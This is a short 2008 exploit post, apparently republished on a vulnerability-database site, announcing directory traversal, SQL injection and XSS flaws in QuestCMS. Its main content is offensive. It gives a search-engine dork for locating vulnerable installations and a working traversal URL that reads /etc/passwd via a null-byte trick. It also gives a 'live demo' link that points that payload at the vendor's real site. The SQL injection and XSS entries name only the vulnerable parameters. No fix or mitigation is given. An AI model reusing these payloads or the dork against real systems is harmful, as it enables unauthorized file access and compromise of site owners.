Questcms (XSS/Directory Traversal/SQL) Multiple Remote Vulnerabilities

2008.10.30
Credit: d3b4g
Risk: High
Local: No
Remote: Yes

-------------------------------------------------------------------------------- Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql] -------------------------------------------------------------------------------- #Author: d3b4g #contact: bl4ckend[at]gmail[dot]com -------------------------------------------------------------------------------- Affected software: -------------------------------------------------------------------------------- Application : Questwork Web Content Management system (QuestCMS) URL : http://www.questwork.com -------------------------------------------------------------------------------- dork : allinurl:"/questcms/" -------------------------------------------------------------------------------- Directory traversal vulnibility ============================= Exploit : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html Live demo : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html --------------------------------------------------------------------------------- sql injection: ============== Vuln file:questcms/main/main.php?obj=[sql] XSS: ==== exploit:/main/main.php?cx=[Xss] -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- greetz: All my friends,milw0rm... -------------------------------------------------------------------------------- --------------------------------- [ www.hotlism.org ] --------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top